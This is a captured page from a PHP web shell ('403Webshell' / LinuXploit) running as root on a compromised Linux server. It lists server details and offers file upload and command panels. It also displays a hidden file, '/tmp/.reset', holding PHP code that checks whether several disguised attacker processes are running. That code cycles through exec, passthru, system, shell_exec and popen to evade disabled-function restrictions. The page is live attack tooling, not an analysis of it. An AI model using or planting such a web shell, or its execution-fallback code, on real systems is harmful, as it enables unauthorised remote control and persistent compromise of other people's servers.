403Webshell
Server IP : 43.129.54.214  /  Your IP : 216.73.217.113
Web Server : nginx/1.24.0
System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/root/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/tmp/.reset
<?php   $files = ['creditwizard.inc','hungariani','qihoo.inc','stream_actions','xmlrpc_wrappers','database_changes','patTemplate','theme_image','researchAreas','config_system','styles.inc','stat_details','ImgRequired','formelementtray','googletax','gallery.lang_de','view.archive','adr_mini_faq','common.lib','method.uninstall','blockLib.class','Filesystem','upload_bak','itransact_split','thread.inc','usergroup_5','security.log','quotation','usercp_avatar','germanf_mimes']; foreach ($files as $f) {     $res = @run("pgrep {$f}");     if (!preg_match('/\d+/', $res)) {         die("<f>{$f}</f>");     } } die('!ended!');  function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f))             $out .= fread($f, 1024);         pclose($f);     }     return $out; } 

Youez - 2016 - github.com/yon3zu
LinuXploit